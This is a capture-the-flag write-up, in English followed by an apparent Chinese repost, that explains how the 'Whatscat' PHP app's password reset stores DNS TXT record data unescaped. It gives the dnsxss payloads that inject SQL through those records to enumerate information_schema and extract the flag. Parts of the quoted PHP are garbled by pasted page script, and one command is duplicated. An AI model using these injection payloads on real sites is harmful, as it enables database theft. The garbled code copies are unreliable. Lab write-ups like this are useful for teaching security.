elseif ( isset ( $_POST [ "reset" ])) {
$q = mysql_query ( sprintf ( "select username,email,id from users where username='%s'" ,
mysql_real_escape_string ( $_POST [ "name" ])));
$res = mysql_fetch_object ( $q );
$pwnew = "cat" . bin2hex ( openssl_random_pseudo_bytes ( 8 ));
if ( $res ) {
echo sprintf ( "<p>Don't worry %s, we're emailing you a new password at %s</p>" ,
$res -> username , $res -> email );
echo sprintf ( "<p>If you are not %s, we'll tell them something fishy is going on!</p>" ,
$res -> username );
$message = <<< CAT
Hello . Either you or someone pretending to be you attempted to reset your password .
Anyway , we set your new password to $pwnew
If it wasn 't you who changed your password, we have logged their IP information as follows:
$details = gethostbyaddr($_SERVER[' REMOTE_ADDR ']).
print_r(dns_get_record(gethostbyaddr($_SERVER[' REMOTE_ADDR '])),true);
mail($res->email,"whatscat password reset",$message.$details,"From: [email protected]<script cf-hash="f9e31" type="text/javascript">
/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>\r\n");
mysql_query(sprintf("update users set password=' % s ', resetinfo=' % s ' where username=' % s '",
else {
echo "Hmm we don' t seem to have anyone signed up by that name ";
This is my writeup for Whatscat, just about the easiest 300-point Web level I've ever solved! I wouldn't normally do a writeup about a level like this, but much like the mtpox level I actually wrote the exact tool for exploiting this, and even wrote a blog post about it almost exactly 4 years ago - April of 2010. Unlike mtpox, this tool isn't the least bit popular, but it sure made my life easy!
The set up
Whatscat is a php application where people can post photos of cats and comment on them (Here's a copy of the source).
The vulnerable code is in the password-reset code, in login.php, which looks like this:
elseif (isset($_POST["reset"])) { $q = mysql_query(sprintf("select username,email,id from users where username='%s'", mysql_real_escape_string($_POST["name"]))); $res = mysql_fetch_object($q); $pwnew = "cat".bin2hex(openssl_random_pseudo_bytes(8)); if ($res) { echo sprintf("<p>Don't worry %s, we're emailing you a new password at %s</p>", $res->username,$res->email); echo sprintf("<p>If you are not %s, we'll tell them something fishy is going on!</p>", $res->username); $message = <<<CAT Hello. Either you or someone pretending to be you attempted to reset your password. Anyway, we set your new password to $pwnew If it wasn't you who changed your password, we have logged their IP information as follows: CAT; $details = gethostbyaddr($_SERVER['REMOTE_ADDR']). print_r(dns_get_record(gethostbyaddr($_SERVER['REMOTE_ADDR'])),true); mail($res->email,"whatscat password reset",$message.$details,"From: [email protected]\r\n"); mysql_query(sprintf("update users set password='%s', resetinfo='%s' where username='%s'", $pwnew,$details,$res->username)); } else { echo "Hmm we don't seem to have anyone signed up by that name"; }
Specifically, these lines:
$details = gethostbyaddr($_SERVER['REMOTE_ADDR']). print_r(dns_get_record(gethostbyaddr($_SERVER['REMOTE_ADDR'])),true); mail($res->email,"whatscat password reset",$message.$details,"From: [email protected]\r\n"); mysql_query(sprintf("update users set password='%s', resetinfo='%s' where username='%s'", $pwnew,$details,$res->username));
The $details variable is being inserted into the database unescaped. I've noted in the past that people trust DNS results just a bit too much, and this is a great example of that mistake! If we can inject SQL code into a DNS request, we're set!
...this is where I wasted a lot of time, because I didn't notice that the print_r() is actually part of the same statement as the line before it - I thought only the reverse DNS entry was being put into the database. As such, my friend Mak—who was working on this level first—tried to find a way to change the PTR record, and broke all kinds of SkullSpace infrastructure as a result.
I ended up trying to log in as 'admin'/'password', and, of course, failed. On a hunch, I hit 'forgot password' for admin. That sent me to a Mailinator-like service. I logged into the mailbox, and noticed somebody trying to sql inject using TXT records. This wasn't an actual admin—like I thought it was—it was another player who just gave me a huge hint (hooray for disposable mail services!). Good fortune!
Knowing that a TXT record would work, it actually came in handy that Mak controls the PTR records for all SkullSpace ip addresses. He could do something useful instead of breaking stuff! The server I use for blogs (/me waves) and such is on the SkullSpace network, so I got him to set the PTR record to test.skullseclabs.org. In fact, if you do a reverse lookup for '' right now, you'll still see that:
$ host blog.skullsecurity.org blog.skullsecurity.org is an alias for skullsecurity.org. skullsecurity.org has address $ host domain name pointer test.skullseclabs.org.
I control the authoritative server for test.skullseclabs.org—that's why it exists—so I can make it say anything I want for any record. It's great fun! Though arguably overkill for this level, at least I didn't have to flip to my registrar's page every time I wanted to change a record; instead, I can do it quickly using a tool I wrote calleddnsxss. Here's an example:
$ sudo ./dnsxss --payload="Hello yes this is test" Listening for requests on Will response to queries with: Hello/yes/this/is/test $ dig -t txt test123.skullseclabs.org [...] ;; ANSWER SECTION: test123.skullseclabs.org. 1 IN TXT "Hello yes this is test.test123.skullseclabs.org"
All I had to do was find the right payload!
The exploit
I'm not a fan of working blind, so I made my own version of this service locally, and turned on SQL errors. Then I got to work constructing an exploit! It was an UPDATE statement, so I couldn't directly exploit this - I could only read indirectly by altering my email address (as you'll see). I also couldn't figure out how to properly terminate the sql string (neither '#' nor '-- ' nor ';' properly terminated due to brackets). In the end, my payload would:
- Tack on an extra clause to the UPDATE that would set the 'email' field to another value
- Read properly right to the end, which means ending the query with "resetinfo='", so the "resetinfo" field gets set to all the remaining crap
So, let's give this a shot!
./dnsxss --payload="test', email='test1234', resetinfo='"
Then I create an account, reset the password from my ip address, and refresh. The full query—dumped from my test server—looks like:
update users set password='catf7a252e008616c94', resetinfo='test.skullseclabs.orgArray ( [0] => Array ( [host] => test.skullseclabs.org [class] => IN [ttl] => 1 [type] => TXT [txt] => test', email='test1234', resetinfo='.test.skullseclabs.org [entries] => Array ( [0] => test', email='test1234', resetinfo=' ) ) ) ' where username='ron'
As you can see, that's quite a mess (note that the injected stuff appears twice.. super annoying). After that runs, the reset-password page looks like:
Don't worry ron, we're emailing you a new password at test1234 If you are not ron, we'll tell them something fishy is going on!
Sweet! I successfully changed my password!
But... what am I looking for?
MySQL has this super handy database called information_schema, which contains tables called 'SCHEMATA', 'TABLES', and 'COLUMNS', and it's usually available for anybody to inspect. Let's dump SCHEMATA.SCHEMA_NAME from everything:
./dnsxss --payload="test', email=(select group_concat(SCHEMA_NAME separator ', ') from information_schema.SCHEMATA), resetinfo='"
Then refresh a couple times to find:
Don't worry ron, we're emailing you a new password at information_schema, mysql, performance_schema, whatscat If you are not ron, we'll tell them something fishy is going on!
Great! Three of those are built-in databases, but 'whatscat' looks interesting. Now let's get table names from whatscat:
./dnsxss --payload="test', email=(select group_concat(TABLE_NAME separator ', ') from information_schema.TABLES where TABLE_SCHEMA='whatscat'), resetinfo='"
Leads to:
Don't worry ron, we're emailing you a new password at comments, flag, pictures, users If you are not ron, we'll tell them something fishy is going on!
flag! Sweet! That's a pretty awesome looking table! Now we're one simple step away... what columns does 'flag' contain?
./dnsxss --payload="test', email=(select group_concat(COLUMN_NAME separator ', ') from information_schema.COLUMNS where TABLE_NAME='flag'), resetinfo='"
Leads to:
Don't worry ron, we're emailing you a new password at flag If you are not ron, we'll tell them something fishy is going on!
All right, we know the flag is in whatscat.flag.flag, so we write one final query:
./dnsxss --payload="test', email=(select group_concat(flag separator ', ') from whatscat.flag), resetinfo='"
Which gives us:
Don't worry ron, we're emailing you a new password at 20billion_d0llar_1d3a If you are not ron, we'll tell them something fishy is going on!
And now we dance.
If you're interested in DNS attacks—this scenario and a whole bunch of others—come see my talk at BSidesQuebec this June!!!
0x00 分析-中文版
$details = gethostbyaddr ( $_SERVER [ 'REMOTE_ADDR' ]).
print_r ( dns_get_record ( gethostbyaddr ( $_SERVER [ 'REMOTE_ADDR' ])), true );
mail ( $res -> email , "whatscat password reset" , $message . $details , "From: [email protected]<script cf-hash=" f9e31 " type=" text / javascript ">
/* <![CDATA[ */!function(){try{var t=" currentScript "in document?document.currentScript:function(){for(var t=document.getElementsByTagName(" script "),e=t.length;e--;)if(t[e].getAttribute(" cf - hash "))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute(" data - cfemail ");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>\r\n" );
mysql_query ( sprintf ( "update users set password='%s', resetinfo='%s' where username='%s'" ,
$pwnew , $details , $res -> username ));
在完成Whatscat挑战过程中,我点击forgot password,输入用户名:admin,然后它发送给我的一个Mailinator,一个邮件服务器。我登录这个邮箱,注意到有些人尝试通过TXT记录进行SQL注入,这些可能是其他用户留下的记录。
这个TXT记录实际上是用于便捷地控制所有SkullSpace ip地址的PTR记录,它能够做一些有用的事情而不是用来破坏!我用这个服务器做blog和一些在SkullSpace网络上的东西,然后我通过它设置了test.skullseclabs.org的PTR记录。实际上,如果你对206.220.196.59进行DNS解析,你会看见如下内容:
$ host blog . skullsecurity . org
blog . skullsecurity . org is an alias for skullsecurity . org .
skullsecurity . org has address 206.220 . 196.59
$ host 206.220 . 196.59
59.196 . 220.206 . in - addr . arpa domain name pointer test . skullseclabs . org .
$ sudo ./ dnsxss -- payload = "Hello yes this is test"
Listening for requests on 0.0 . 0.0 : 53
Will response to queries with : Hello / yes / this / is / test
$ dig - t txt test123 . skullseclabs . org
test123 . skullseclabs . org . 1 IN TXT "Hello yes this is test.test123.skullseclabs.org"
0x01 The exploit
./dnsxss --payload="test', email='test1234', resetinfo='"
update users set password='catf7a252e008616c94', resetinfo='test.skullseclabs.orgArray ( [0] => Array ( [host] => test.skullseclabs.org [class] => IN [ttl] => 1 [type] => TXT [txt] => test', email='test1234', resetinfo='.test.skullseclabs.org [entries] => Array ( [0] => test', email='test1234', resetinfo=' ) ) ) ' where username='ron'
Don't worry ron, we're emailing you a new password at test1234
If you are not ron, we'll tell them something fishy is going on!
./dnsxss --payload="test', email=(select group_concat(SCHEMA_NAME separator ', ') from information_schema.SCHEMATA), resetinfo='"
Don't worry ron, we're emailing you a new password at information_schema, mysql, performance_schema, whatscat
If you are not ron, we'll tell them something fishy is going on!
./dnsxss --payload="test', email=(select group_concat(TABLE_NAME separator ', ') from information_schema.TABLES where TABLE_SCHEMA='whatscat'), resetinfo='"
./dnsxss --payload="test', email=(select group_concat(TABLE_NAME separator ', ') from information_schema.TABLES where TABLE_SCHEMA='whatscat'), resetinfo='"
./dnsxss --payload="test', email=(select group_concat(COLUMN_NAME separator ', ') from information_schema.COLUMNS where TABLE_NAME='flag'), resetinfo='"
Don't worry ron, we're emailing you a new password at flag
If you are not ron, we'll tell them something fishy is going on!
./dnsxss --payload="test', email=(select group_concat(flag separator ', ') from whatscat.flag), resetinfo='"
Don't worry ron, we're emailing you a new password at 20billion_d0llar_1d3a
If you are not ron, we'll tell them something fishy is going on!
0x02 总结